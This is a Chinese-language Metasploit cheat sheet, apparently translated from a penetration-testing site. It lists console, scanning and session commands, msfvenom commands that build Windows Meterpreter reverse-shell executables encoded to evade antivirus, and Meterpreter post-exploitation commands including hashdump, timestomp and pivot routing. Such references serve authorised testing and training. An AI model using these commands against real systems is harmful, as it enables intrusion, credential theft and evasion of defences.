Metasploit:
搜索模块:
msf > search [regex]
指定并利用:
msf > use exploit/[ExploitPath]
指定要使用的有效负载:
msf > set PAYLOAD [PayloadPath]
显示当前模块的选项:
msf > show options
设置选项:
msf > set [Option] [Value]
开始利用:
msf > exploit
有
端口扫描仪:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS枚举:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP服务器:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
代理服务器:
msf > use auxiliary/server/socks4
msf > run
msfvenom:
该 msfvenom工具可以被用来生成Metasploit的有效载荷(如Meterpreter就会)作为独立的文件,并且能随意的进行编码以便于免杀。此工具取代了以前的msfpayload和msfencode工具。使用’-l payloads’运行以获取有效负载列表。
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
示例:将Meterpreter有效负载
反转为可执行文件并重定向到文件中:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
格式选项(用-f指定)–help-formats – 列出可用的输出格式
exe – 可执行文件pl – Perl rb – Ruby raw – 原始shellcode c – C代码
使用msfvenom编码有效负载
msfvenom工具可用于应用级别用于过杀软的编码。使用’-l encoders’运行以获取编码器列表。
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
示例
使用shikata-ga-nai编码器从msfpayload对有效负载进行5次编码并输出为可执行文件:
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Metasploit Meterpreter
基本命令:
?/ help:显示命令摘要退出/退出:退出Meterpreter会话
sysinfo:显示系统名称和操作系统类型
shutdown / reboot:不言自明的
文件系统命令:
cd:更改目录
lcd:更改本地(攻击者)计算机上的目录
pwd / getwd:显示当前工作目录
ls:显示目录
cat的内容:在屏幕上
下载/上传显示文件内容:将文件移入/移出目标机器
mkdir / rmdir:创建/删除目录
编辑:打开一个默认编辑器中的文件(通常是vi)
进程命令:
getpid:显示Meterpreter正在其中运行的进程ID。
getuid:显示Meterpreter正在运行的用户ID。
ps:显示进程列表。
kill:根据进程ID终止进程。
执行:使用加载Meterpreter的进程的权限运行给定程序。
迁移:跳转到给定的目标进程ID
- 目标进程必须具有相同或更低的权限
- 目标过程可能是一个更稳定的过程
- 在进程内部时,可以访问进程锁定的任何文件。
网络命令:
ipconfig:显示网络接口信息
portfwd:通过TCP会话 路由转发数据包
:管理/查看系统的路由表
Misc命令:
idletime:显示目标机器的GUI空闲的持续时间。
uictl [enable / disable] [keyboard / mouse]:启用/禁用目标机器的鼠标或键盘。
屏幕截图:将图像保存为目标计算机的屏幕截图。
附加模块:
使用[module]:加载指定的模块
示例:
use priv:加载priv模块
hashdump:导出哈希
timestomp:更改NTFS文件时间戳
管理会话
多次利用:
运行漏洞利用单个会话立即转为后台:
msf > exploit -z
在后台运行漏洞利用一个或多个立即后台的会话:
msf > exploit –j
列出所有当前作业(通常利用侦听器):
msf > jobs –l
杀掉某个运行中的会话
msf > jobs –k [JobID]
多个会话:
列出所有后台会话:
msf > sessions -l
与后台会话互动:
msf > session -i [SessionID]
当前的交互式会话:
meterpreter > <Ctrl+Z>
or
meterpreter > background
通过会话路由:
针对目标子网掩码的所有模块(exploit/ post / aux)将通过此会话进行尝试。
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]
本文转译自【https://pentesttools.net/metasploit-cheat-sheet/】
原创文章,作者:absec,如若转载,请注明出处:http://absec.cn/?p=422